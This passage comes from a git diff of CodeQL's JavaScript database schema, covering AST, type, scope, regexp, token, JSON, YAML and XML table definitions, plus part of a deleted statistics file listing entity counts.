@proper_varaccess -| 80 = @class_expr -| 81 = @super_expr -| 82 = @newtarget_expr -| 83 = @named_import_specifier -| 84 = @import_default_specifier -| 85 = @import_namespace_specifier -| 86 = @named_export_specifier -| 87 = @exp_expr -| 88 = @assign_exp_expr -| 89 = @jsx_element -| 90 = @jsx_qualified_name -| 91 = @jsx_empty_expr -| 92 = @await_expr -| 93 = @function_sent_expr -| 94 = @decorator -| 95 = @export_default_specifier -| 96 = @export_namespace_specifier -| 97 = @bind_expr -| 98 = @external_module_reference -| 99 = @dynamic_import -| 100 = @expression_with_type_arguments -| 101 = @prefix_type_assertion -| 102 = @as_type_assertion -| 103 = @export_varaccess -| 104 = @decorator_list -| 105 = @non_null_assertion -| 106 = @bigint_literal -| 107 = @nullishcoalescing_expr -| 108 = @e4x_xml_anyname -| 109 = @e4x_xml_static_attribute_selector -| 110 = @e4x_xml_dynamic_attribute_selector -| 111 = @e4x_xml_filter_expression -| 112 = @e4x_xml_static_qualident -| 113 = @e4x_xml_dynamic_qualident -| 114 = @e4x_xml_dotdotexpr -| 115 = @import_meta_expr -| 116 = @assignlogandexpr -| 117 = @assignlogorexpr -| 118 = @assignnullishcoalescingexpr -| 119 = @template_pipe_ref -| 120 = @generated_code_expr -| 121 = @satisfies_expr -; - -@varaccess = @proper_varaccess | @export_varaccess; -@varref = @var_decl | @varaccess; - -@identifier = @label | @varref | @type_identifier; - -@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; - -@propaccess = @dot_expr | @index_expr; - -@invokeexpr = @new_expr | @call_expr; - -@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; - -@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; - -@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; - -@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | 
@mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; - -@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; - -@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; - -@pattern = @varref | @array_pattern | @object_pattern; - -@comprehension_expr = @array_comprehension_expr | @generator_expr; - -@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; - -@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; - -@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; - -@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; - -@type_assertion = @as_type_assertion | @prefix_type_assertion; - -@class_definition = @class_decl_stmt | @class_expr; -@interface_definition = @interface_declaration | @interface_typeexpr; -@class_or_interface = @class_definition | @interface_definition; - -@lexical_decl = @var_decl | @type_decl; -@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; -@lexical_ref = @lexical_decl | @lexical_access; - -@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; -@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; - -expr_contains_template_tag_location( - int expr: @expr ref, - int location: @location ref -); - -@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; - -template_placeholder_tag_info( - unique int node: @template_placeholder_tag, - int parentNode: 
@template_placeholder_tag_parent ref, - varchar(900) raw: string ref -); - -// scopes -scopes (unique int id: @scope, - int kind: int ref); - -case @scope.kind of - 0 = @global_scope -| 1 = @function_scope -| 2 = @catch_scope -| 3 = @module_scope -| 4 = @block_scope -| 5 = @for_scope -| 6 = @for_in_scope // for-of scopes work the same as for-in scopes -| 7 = @comprehension_block_scope -| 8 = @class_expr_scope -| 9 = @namespace_scope -| 10 = @class_decl_scope -| 11 = @interface_scope -| 12 = @type_alias_scope -| 13 = @mapped_type_scope -| 14 = @enum_scope -| 15 = @external_module_scope -| 16 = @conditional_type_scope; - -scopenodes (unique int node: @ast_node ref, - int scope: @scope ref); - -scopenesting (unique int inner: @scope ref, - int outer: @scope ref); - -// functions -@function = @function_decl_stmt | @function_expr | @arrow_function_expr; - -@parameterized = @function | @catch_clause; -@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; - -is_generator (int fun: @function ref); -has_rest_parameter (int fun: @function ref); -is_async (int fun: @function ref); - -// variables and lexically scoped type names -#keyset[scope, name] -variables (unique int id: @variable, - varchar(900) name: string ref, - int scope: @scope ref); - -#keyset[scope, name] -local_type_names (unique int id: @local_type_name, - varchar(900) name: string ref, - int scope: @scope ref); - -#keyset[scope, name] -local_namespace_names (unique int id: @local_namespace_name, - varchar(900) name: string ref, - int scope: @scope ref); - -is_arguments_object (int id: @variable ref); - -@lexical_name = @variable | @local_type_name | @local_namespace_name; - -@bind_id = @varaccess | @local_var_type_access; -bind (unique int id: @bind_id ref, - int decl: @variable ref); - -decl (unique int id: @var_decl ref, - int decl: @variable ref); - -@typebind_id = @local_type_access | @export_varaccess; -typebind (unique int id: @typebind_id 
ref, - int decl: @local_type_name ref); - -@typedecl_id = @type_decl | @var_decl; -typedecl (unique int id: @typedecl_id ref, - int decl: @local_type_name ref); - -namespacedecl (unique int id: @var_decl ref, - int decl: @local_namespace_name ref); - -@namespacebind_id = @local_namespace_access | @export_varaccess; -namespacebind (unique int id: @namespacebind_id ref, - int decl: @local_namespace_name ref); - - -// properties in object literals, property patterns in object patterns, and method declarations in classes -#keyset[parent, index] -properties (unique int id: @property, - int parent: @property_parent ref, - int index: int ref, - int kind: int ref, - varchar(900) tostring: string ref); - -case @property.kind of - 0 = @value_property -| 1 = @property_getter -| 2 = @property_setter -| 3 = @jsx_attribute -| 4 = @function_call_signature -| 5 = @constructor_call_signature -| 6 = @index_signature -| 7 = @enum_member -| 8 = @proper_field -| 9 = @parameter_field -| 10 = @static_initializer -; - -@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; -@property_accessor = @property_getter | @property_setter; -@call_signature = @function_call_signature | @constructor_call_signature; -@field = @proper_field | @parameter_field; -@field_or_vardeclarator = @field | @var_declarator; - -is_computed (int id: @property ref); -is_method (int id: @property ref); -is_static (int id: @property ref); -is_abstract_member (int id: @property ref); -is_const_enum (int id: @enum_declaration ref); -is_abstract_class (int id: @class_decl_stmt ref); - -has_public_keyword (int id: @property ref); -has_private_keyword (int id: @property ref); -has_protected_keyword (int id: @property ref); -has_readonly_keyword (int id: @property ref); -has_type_keyword (int id: @type_keyword_operand ref); -is_optional_member (int id: @property ref); -has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); 
-is_optional_parameter_declaration (unique int parameter: @pattern ref); - -#keyset[constructor, param_index] -parameter_fields( - unique int field: @parameter_field ref, - int constructor: @function_expr ref, - int param_index: int ref -); - -// types -#keyset[parent, idx] -typeexprs ( - unique int id: @typeexpr, - int kind: int ref, - int parent: @typeexpr_parent ref, - int idx: int ref, - varchar(900) tostring: string ref -); - -case @typeexpr.kind of - 0 = @local_type_access -| 1 = @type_decl -| 2 = @keyword_typeexpr -| 3 = @string_literal_typeexpr -| 4 = @number_literal_typeexpr -| 5 = @boolean_literal_typeexpr -| 6 = @array_typeexpr -| 7 = @union_typeexpr -| 8 = @indexed_access_typeexpr -| 9 = @intersection_typeexpr -| 10 = @parenthesized_typeexpr -| 11 = @tuple_typeexpr -| 12 = @keyof_typeexpr -| 13 = @qualified_type_access -| 14 = @generic_typeexpr -| 15 = @type_label -| 16 = @typeof_typeexpr -| 17 = @local_var_type_access -| 18 = @qualified_var_type_access -| 19 = @this_var_type_access -| 20 = @predicate_typeexpr -| 21 = @interface_typeexpr -| 22 = @type_parameter -| 23 = @plain_function_typeexpr -| 24 = @constructor_typeexpr -| 25 = @local_namespace_access -| 26 = @qualified_namespace_access -| 27 = @mapped_typeexpr -| 28 = @conditional_typeexpr -| 29 = @infer_typeexpr -| 30 = @import_type_access -| 31 = @import_namespace_access -| 32 = @import_var_type_access -| 33 = @optional_typeexpr -| 34 = @rest_typeexpr -| 35 = @bigint_literal_typeexpr -| 36 = @readonly_typeexpr -| 37 = @template_literal_typeexpr -; - -@typeref = @typeaccess | @type_decl; -@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; -@typeexpr_parent = @expr | @stmt | @property | @typeexpr; -@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; -@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; -@vartypeaccess = 
@local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; -@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; -@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; - -@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; - -// types -types ( - unique int id: @type, - int kind: int ref, - varchar(900) tostring: string ref -); - -#keyset[parent, idx] -type_child ( - int child: @type ref, - int parent: @type ref, - int idx: int ref -); - -case @type.kind of - 0 = @any_type -| 1 = @string_type -| 2 = @number_type -| 3 = @union_type -| 4 = @true_type -| 5 = @false_type -| 6 = @type_reference -| 7 = @object_type -| 8 = @canonical_type_variable_type -| 9 = @typeof_type -| 10 = @void_type -| 11 = @undefined_type -| 12 = @null_type -| 13 = @never_type -| 14 = @plain_symbol_type -| 15 = @unique_symbol_type -| 16 = @objectkeyword_type -| 17 = @intersection_type -| 18 = @tuple_type -| 19 = @lexical_type_variable_type -| 20 = @this_type -| 21 = @number_literal_type -| 22 = @string_literal_type -| 23 = @unknown_type -| 24 = @bigint_type -| 25 = @bigint_literal_type -; - -@boolean_literal_type = @true_type | @false_type; -@symbol_type = @plain_symbol_type | @unique_symbol_type; -@union_or_intersection_type = @union_type | @intersection_type; -@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; - -has_asserts_keyword(int node: @predicate_typeexpr ref); - -@typed_ast_node = @expr | @typeexpr | @function; -ast_node_type( - unique int node: @typed_ast_node ref, - int typ: @type ref); - -declared_function_signature( - unique int node: @function ref, - int sig: @signature_type ref -); - -invoke_expr_signature( - unique int node: @invokeexpr ref, - int sig: @signature_type ref -); - -invoke_expr_overload_index( - unique int node: @invokeexpr ref, - int index: int ref -); - -symbols ( - unique int id: 
@symbol, - int kind: int ref, - varchar(900) name: string ref -); - -symbol_parent ( - unique int symbol: @symbol ref, - int parent: @symbol ref -); - -symbol_module ( - int symbol: @symbol ref, - varchar(900) moduleName: string ref -); - -symbol_global ( - int symbol: @symbol ref, - varchar(900) globalName: string ref -); - -case @symbol.kind of - 0 = @root_symbol -| 1 = @member_symbol -| 2 = @other_symbol -; - -@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; -@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; - -ast_node_symbol( - unique int node: @ast_node_with_symbol ref, - int symbol: @symbol ref); - -type_symbol( - unique int typ: @type_with_symbol ref, - int symbol: @symbol ref); - -#keyset[typ, name] -type_property( - int typ: @type ref, - varchar(900) name: string ref, - int propertyType: @type ref); - -type_alias( - unique int aliasType: @type ref, - int underlyingType: @type ref); - -@literal_type = @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; -@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; -type_literal_value( - unique int typ: @type_with_literal_value ref, - varchar(900) value: string ref); - -signature_types ( - unique int id: @signature_type, - int kind: int ref, - varchar(900) tostring: string ref, - int type_parameters: int ref, - int required_params: int ref -); - -is_abstract_signature( - unique int sig: @signature_type ref -); - -signature_rest_parameter( - unique int sig: @signature_type ref, - int rest_param_arra_type: @type ref -); - -case @signature_type.kind of - 0 = @function_signature_type -| 1 = @constructor_signature_type -; - -#keyset[typ, kind, index] -type_contains_signature ( - int typ: @type ref, - int kind: int 
ref, // constructor/call/index - int index: int ref, // ordering of overloaded signatures - int sig: @signature_type ref -); - -#keyset[parent, index] -signature_contains_type ( - int child: @type ref, - int parent: @signature_type ref, - int index: int ref -); - -#keyset[sig, index] -signature_parameter_name ( - int sig: @signature_type ref, - int index: int ref, - varchar(900) name: string ref -); - -number_index_type ( - unique int baseType: @type ref, - int propertyType: @type ref -); - -string_index_type ( - unique int baseType: @type ref, - int propertyType: @type ref -); - -base_type_names( - int typeName: @symbol ref, - int baseTypeName: @symbol ref -); - -self_types( - int typeName: @symbol ref, - int selfType: @type_reference ref -); - -tuple_type_min_length( - unique int typ: @type ref, - int minLength: int ref -); - -tuple_type_rest_index( - unique int typ: @type ref, - int index: int ref -); - -// comments -comments (unique int id: @comment, - int kind: int ref, - int toplevel: @toplevel ref, - varchar(900) text: string ref, - varchar(900) tostring: string ref); - -case @comment.kind of - 0 = @slashslash_comment -| 1 = @slashstar_comment -| 2 = @doc_comment -| 3 = @html_comment_start -| 4 = @htmlcommentend; - -@html_comment = @html_comment_start | @htmlcommentend; -@line_comment = @slashslash_comment | @html_comment; -@block_comment = @slashstar_comment | @doc_comment; - -// source lines -lines (unique int id: @line, - int toplevel: @toplevel ref, - varchar(900) text: string ref, - varchar(2) terminator: string ref); -indentation (int file: @file ref, - int lineno: int ref, - varchar(1) indentChar: string ref, - int indentDepth: int ref); - -// JavaScript parse errors -js_parse_errors (unique int id: @js_parse_error, - int toplevel: @toplevel ref, - varchar(900) message: string ref, - varchar(900) line: string ref); - -// regular expressions -#keyset[parent, idx] -regexpterm (unique int id: @regexpterm, - int kind: int ref, - int parent: @regexpparent 
ref, - int idx: int ref, - varchar(900) tostring: string ref); - -@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr; - -case @regexpterm.kind of - 0 = @regexp_alt -| 1 = @regexp_seq -| 2 = @regexp_caret -| 3 = @regexp_dollar -| 4 = @regexp_wordboundary -| 5 = @regexp_nonwordboundary -| 6 = @regexp_positive_lookahead -| 7 = @regexp_negative_lookahead -| 8 = @regexp_star -| 9 = @regexp_plus -| 10 = @regexp_opt -| 11 = @regexp_range -| 12 = @regexp_dot -| 13 = @regexp_group -| 14 = @regexp_normal_constant -| 15 = @regexp_hex_escape -| 16 = @regexp_unicode_escape -| 17 = @regexp_dec_escape -| 18 = @regexp_oct_escape -| 19 = @regexp_ctrl_escape -| 20 = @regexp_char_class_escape -| 21 = @regexp_id_escape -| 22 = @regexp_backref -| 23 = @regexp_char_class -| 24 = @regexp_char_range -| 25 = @regexp_positive_lookbehind -| 26 = @regexp_negative_lookbehind -| 27 = @regexp_unicode_property_escape; - -regexp_parse_errors (unique int id: @regexp_parse_error, - int regexp: @regexpterm ref, - varchar(900) message: string ref); - -@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range; -@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape; -@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape; -@regexp_constant = @regexp_normal_constant | @regexp_char_escape; -@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead; -@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind; -@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind; -@regexp_anchor = @regexp_dollar | @regexp_caret; - -is_greedy (int id: @regexp_quantifier ref); -range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref); -range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref); -is_capture (unique int id: @regexp_group ref, int number: 
int ref); -is_named_capture (unique int id: @regexp_group ref, string name: string ref); -is_inverted (int id: @regexp_char_class ref); -regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref); -char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref); -backref (unique int id: @regexp_backref ref, int value: int ref); -named_backref (unique int id: @regexp_backref ref, string name: string ref); -unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref); -unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref); - -// tokens -#keyset[toplevel, idx] -tokeninfo (unique int id: @token, - int kind: int ref, - int toplevel: @toplevel ref, - int idx: int ref, - varchar(900) value: string ref); - -case @token.kind of - 0 = @token_eof -| 1 = @token_null_literal -| 2 = @token_boolean_literal -| 3 = @token_numeric_literal -| 4 = @token_string_literal -| 5 = @token_regular_expression -| 6 = @token_identifier -| 7 = @token_keyword -| 8 = @token_punctuator; - -// associate comments with the token immediately following them (which may be EOF) -next_token (int comment: @comment ref, int token: @token ref); - -// JSON -#keyset[parent, idx] -json (unique int id: @json_value, - int kind: int ref, - int parent: @json_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); - -json_literals (varchar(900) value: string ref, - varchar(900) raw: string ref, - unique int expr: @json_value ref); - -json_properties (int obj: @json_object ref, - varchar(900) property: string ref, - int value: @json_value ref); - -json_errors (unique int id: @json_parse_error, - varchar(900) message: string ref); - -json_locations(unique int locatable: @json_locatable ref, - int location: @location_default ref); - -case @json_value.kind of - 0 = @json_null -| 1 = @json_boolean -| 2 = @json_number -| 3 = @json_string -| 4 = 
@json_array -| 5 = @json_object; - -@json_parent = @json_object | @json_array | @file; - -@json_locatable = @json_value | @json_parse_error; - -// locations -@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr; - -@locatable = @file - | @ast_node - | @comment - | @line - | @js_parse_error | @regexp_parse_error - | @regexpterm - | @json_locatable - | @token - | @cfg_node - | @jsdoc | @jsdoc_type_expr | @jsdoc_tag - | @yaml_locatable - | @xmllocatable - | @configLocatable - | @template_placeholder_tag; - -hasLocation (unique int locatable: @locatable ref, - int location: @location ref); - -// CFG -entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref); -exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref); -guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref); -case @guard_node.kind of - 0 = @falsy_guard -| 1 = @truthy_guard; -@condition_guard = @falsy_guard | @truthy_guard; - -@synthetic_cfg_node = @entry_node | @exit_node | @guard_node; -@cfg_node = @synthetic_cfg_node | @expr_parent; - -successor (int pred: @cfg_node ref, int succ: @cfg_node ref); - -// JSDoc comments -jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref); -#keyset[parent, idx] -jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref, - int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref); -jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); -jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); - -#keyset[parent, idx] -jsdoc_type_exprs (unique int id: @jsdoc_type_expr, - int kind: int ref, - int parent: @jsdoc_type_expr_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); -case @jsdoc_type_expr.kind of - 0 = @jsdoc_any_type_expr -| 1 = @jsdoc_null_type_expr -| 2 = @jsdoc_undefined_type_expr -| 3 = @jsdoc_unknown_type_expr -| 4 = @jsdoc_void_type_expr -| 5 
= @jsdoc_named_type_expr -| 6 = @jsdoc_applied_type_expr -| 7 = @jsdoc_nullable_type_expr -| 8 = @jsdoc_non_nullable_type_expr -| 9 = @jsdoc_record_type_expr -| 10 = @jsdoc_array_type_expr -| 11 = @jsdoc_union_type_expr -| 12 = @jsdoc_function_type_expr -| 13 = @jsdoc_optional_type_expr -| 14 = @jsdoc_rest_type_expr -; - -#keyset[id, idx] -jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref); -jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref); -jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref); - -@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag; - -jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref); - -@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property; - -@optionalchainable = @call_expr | @propaccess; - -isOptionalChaining(int id: @optionalchainable ref); - -/** - * The time taken for the extraction of a file. - * This table contains non-deterministic content. - * - * The sum of the `time` column for each (`file`, `timerKind`) pair - * is the total time taken for extraction of `file`. The `extractionPhase` - * column provides a granular view of the extraction time of the file. - */ -extraction_time( - int file : @file ref, - // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`. - int extractionPhase: int ref, - // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds - int timerKind: int ref, - float time: float ref -) - -/** -* Non-timing related data for the extraction of a single file. -* This table contains non-deterministic content. 
-*/ -extraction_data( - int file : @file ref, - // the absolute path to the cache file - varchar(900) cacheFile: string ref, - boolean fromCache: boolean ref, - int length: int ref -) - -/*- YAML -*/ - -#keyset[parent, idx] -yaml (unique int id: @yaml_node, - int kind: int ref, - int parent: @yaml_node_parent ref, - int idx: int ref, - string tag: string ref, - string tostring: string ref); - -case @yaml_node.kind of - 0 = @yaml_scalar_node -| 1 = @yaml_mapping_node -| 2 = @yaml_sequence_node -| 3 = @yaml_alias_node -; - -@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; - -@yaml_node_parent = @yaml_collection_node | @file; - -yaml_anchors (unique int node: @yaml_node ref, - string anchor: string ref); - -yaml_aliases (unique int alias: @yaml_alias_node ref, - string target: string ref); - -yaml_scalars (unique int scalar: @yaml_scalar_node ref, - int style: int ref, - string value: string ref); - -yaml_errors (unique int id: @yaml_error, - string message: string ref); - -yaml_locations(unique int locatable: @yaml_locatable ref, - int location: @location_default ref); - -@yaml_locatable = @yaml_node | @yaml_error; - -/*- XML Files -*/ - -xmlEncoding( - unique int id: @file ref, - string encoding: string ref -); - -xmlDTDs( - unique int id: @xmldtd, - string root: string ref, - string publicId: string ref, - string systemId: string ref, - int fileid: @file ref -); - -xmlElements( - unique int id: @xmlelement, - string name: string ref, - int parentid: @xmlparent ref, - int idx: int ref, - int fileid: @file ref -); - -xmlAttrs( - unique int id: @xmlattribute, - int elementid: @xmlelement ref, - string name: string ref, - string value: string ref, - int idx: int ref, - int fileid: @file ref -); - -xmlNs( - int id: @xmlnamespace, - string prefixName: string ref, - string URI: string ref, - int fileid: @file ref -); - -xmlHasNs( - int elementId: @xmlnamespaceable ref, - int nsId: @xmlnamespace ref, - int fileid: @file ref -); - -xmlComments( - unique int 
id: @xmlcomment, - string text: string ref, - int parentid: @xmlparent ref, - int fileid: @file ref -); - -xmlChars( - unique int id: @xmlcharacters, - string text: string ref, - int parentid: @xmlparent ref, - int idx: int ref, - int isCDATA: int ref, - int fileid: @file ref -); - -@xmlparent = @file | @xmlelement; -@xmlnamespaceable = @xmlelement | @xmlattribute; - -xmllocations( - int xmlElement: @xmllocatable ref, - int location: @location_default ref -); - -@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; - -/*- Configuration files with key value pairs -*/ - -configs( - unique int id: @config -); - -configNames( - unique int id: @configName, - int config: @config ref, - string name: string ref -); - -configValues( - unique int id: @configValue, - int config: @config ref, - string value: string ref -); - -configLocations( - int locatable: @configLocatable ref, - int location: @location_default ref -); - -@configLocatable = @config | @configName | @configValue; diff --git a/ql/lib/semmlecode.javascript.dbscheme.stats b/ql/lib/semmlecode.javascript.dbscheme.stats deleted file mode 100644 index 97ba6f9bcc36..000000000000 --- a/ql/lib/semmlecode.javascript.dbscheme.stats +++ /dev/null 
@@ -1,28248 +0,0 @@ - - - - -@location_default -15664049 - - -@file -6457 - - -@folder -1590 - - -@externalDataElement -950 - - -@toplevel -5320 - - -@script -5200 - - -@inline_script -86 - - -@event_handler -31 - - -@javascript_url -3 - - -@template_toplevel -100 - - -@stmt -1096691 - - -@empty_stmt -1136 - - -@block_stmt -204994 - - -@expr_stmt -610340 - - -@if_stmt -68214 - - -@labeled_stmt -1378 - - -@break_stmt -10149 - - -@continue_stmt -1642 - - -@with_stmt -4 - - -@switch_stmt -1569 - - -@return_stmt -48209 - - -@throw_stmt -2305 - - -@try_stmt -1316 - - -@while_stmt -3120 - - -@do_while_stmt -1471 - - -@for_stmt -5385 - - -@for_in_stmt -1315 - - -@debugger_stmt -3 - - -@function_decl_stmt -16771 - - -@var_decl_stmt -105606 - - -@case -8674 - - -@catch_clause -1272 - - -@for_of_stmt -61 - - -@const_decl_stmt -1118 - - -@let_stmt -551 - - -@legacy_let_stmt -1 - - -@for_each_stmt -1 - - -@class_decl_stmt -41 - - -@import_declaration -8 - - -@export_all_declaration -1 - - -@export_as_namespace_declaration -5 - - -@global_augmentation_declaration -5 - - -@using_decl_stmt -5 - - -@export_default_declaration -5 - - -@export_named_declaration -31 - - -@expr -5495305 - - -@label -722373 - - -@null_literal -15525 - - -@boolean_literal -31652 - - -@number_literal -557620 - - -@string_literal -268843 - - -@regexp_literal -2773 - - -@this_expr -128651 - - -@array_expr -28131 - - -@obj_expr -50958 - - -@function_expr -95744 - - -@seq_expr -2457 - - -@conditional_expr -8111 - - -@new_expr -19023 - - -@call_expr -487075 - - -@dot_expr -602582 - - -@index_expr -105192 - - -@neg_expr -11993 - - -@plus_expr -731 - - -@log_not_expr -19385 - - -@bit_not_expr -403 - - -@typeof_expr -4540 - - -@void_expr -51 - - -@delete_expr -1310 - - -@eq_expr -13468 - - -@neq_expr -5338 - - -@eqq_expr -17758 - - -@neqq_expr -5818 - - -@lt_expr -10254 - - -@le_expr -1503 - - -@gt_expr -5438 - - -@ge_expr -2527 - - -@lshift_expr -5655 - - -@rshift_expr -27749 - - -@urshift_expr -4331 - - 
-@add_expr -88032 - - -@sub_expr -10789 - - -@mul_expr -14075 - - -@div_expr -2496 - - -@mod_expr -655 - - -@bitor_expr -42853 - - -@xor_expr -503 - - -@bitand_expr -8538 - - -@in_expr -1135 - - -@instanceof_expr -1184 - - -@logand_expr -15892 - - -@logor_expr -12711 - - -@assign_expr -245084 - - -@assign_add_expr -6231 - - -@assign_sub_expr -823 - - -@assign_mul_expr -143 - - -@assign_div_expr -44 - - -@assign_mod_expr -17 - - -@assign_lshift_expr -57 - - -@assign_rshift_expr -86 - - -@assign_urshift_expr -96 - - -@assign_or_expr -586 - - -@assign_xor_expr -108 - - -@assign_and_expr -222 - - -@assignlogandexpr -1 - - -@assignlogorexpr -1 - - -@assignnullishcoalescingexpr -1 - - -@template_placeholder_tag -100 - - -@template_pipe_ref -100 - - -@generated_code_expr -100 - - -@satisfies_expr -100 - - -@preinc_expr -1792 - - -@postinc_expr -7103 - - -@predec_expr -457 - - -@postdec_expr -774 - - -@par_expr -86199 - - -@var_declarator -130843 - - -@arrow_function_expr -3730 - - -@spread_element -50 - - -@array_pattern -57 - - -@object_pattern -122 - - -@yield_expr -81 - - -@tagged_template_expr -27 - - -@template_literal -408 - - -@template_literal_typeexpr -100 - - -@template_element -639 - - -@array_comprehension_expr -3 - - -@generator_expr -1 - - -@for_in_comprehension_block -1 - - -@for_of_comprehension_block -3 - - -@legacy_letexpr -1 - - -@var_decl -250257 - - -@proper_varaccess -1295408 - - -@super_expr -11 - - -@newtarget_expr -1 - - -@import_meta_expr -1 - - -@named_import_specifier -4 - - -@import_default_specifier -4 - - -@import_namespace_specifier -2 - - -@named_export_specifier -5 - - -@export_default_specifier -5 - - -@export_namespace_specifier -5 - - -@export_assign_declaration -5 - - -@interface_declaration -5 - - -@type_alias_declaration -120 - - -@enum_declaration -252 - - -@external_module_declaration -100 - - -@external_module_reference -5 - - -@expression_with_type_arguments -45 - - -@prefix_type_assertion -1721 - - -@as_type_assertion -368 - - 
-@export_varaccess -15 - - -@decorator_list -2575 - - -@non_null_assertion -2159 - - -@dynamic_import -5 - - -@import_equals_declaration -5 - - -@namespace_declaration -5 - - -@namespace_scope -5 - - -@exp_expr -14075 - - -@assign_exp_expr -143 - - -@class_expr -41 - - -@scope -118172 - - -@global_scope -1 - - -@function_scope -116245 - - -@catch_scope -1272 - - -@module_scope -21 - - -@block_scope -584 - - -@for_scope -17 - - -@for_in_scope -28 - - -@comprehension_block_scope -4 - - -@class_expr_scope -41 - - -@class_decl_scope -2693 - - -@interface_scope -200 - - -@type_alias_scope -11 - - -@enum_scope -252 - - -@external_module_scope -100 - - -@mapped_type_scope -10 - - -@conditional_type_scope -100 - - -@variable -364388 - - -@local_type_name -23565 - - -@local_namespace_name -20832 - - -@property -142723 - - -@value_property -140856 - - -@property_getter -1529 - - -@property_setter -338 - - -@jsx_attribute -100 - - -@function_call_signature -2458 - - -@constructor_call_signature -37 - - -@index_signature -504 - - -@enum_member -2026 - - -@proper_field -16934 - - -@parameter_field -2693 - - -@static_initializer -100 - - -@local_type_access -25491 - - -@type_decl -2513 - - -@keyword_typeexpr -25306 - - -@string_literal_typeexpr -733 - - -@number_literal_typeexpr -3 - - -@boolean_literal_typeexpr -4 - - -@array_typeexpr -4579 - - -@union_typeexpr -852 - - -@intersection_typeexpr -27 - - -@parenthesized_typeexpr -62 - - -@tuple_typeexpr -98 - - -@keyof_typeexpr -3 - - -@indexed_access_typeexpr -3 - - -@qualified_type_access -3559 - - -@import_namespace_access -100 - - -@import_type_access -100 - - -@import_var_type_access -100 - - -@optional_typeexpr 